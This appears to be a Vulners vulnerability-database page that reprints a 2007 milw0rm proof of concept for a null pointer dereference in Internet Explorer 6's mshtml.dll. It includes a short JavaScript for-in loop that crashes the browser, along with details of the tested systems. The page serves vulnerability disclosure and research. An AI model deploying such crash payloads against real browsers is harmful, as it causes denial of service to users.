Vulners
Lucene search
Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
<!--
+ Title: Microsoft Internet Explorer Malformed HTML Null Pointer Dereference Vulnerability (mshtml.dll) (0-day)
+ Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo Park - [email protected])
+ Critical: Critical
+ Impact: MS Internet Explorer 6 -> Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
Windows 2000 Advanced Server (Korean Language)
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description:
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
Windows XP SP2 system. this bug will crash when executing a 'for' scripts.
+ The following proof-of-concept is also available:
http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->
<html>
<head>
<title> AmesianX, RC_No1 in powerhacker.net ([email protected], [email protected])</title>
</head>
<body>
<script language='javascript'>
var data = document['getElementById'];
for(var key in data);
</script>
</body>
</html>
# milw0rm.com [2007-02-05]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2007 00:00Current
7.4High risk
Vulners AI Score7.4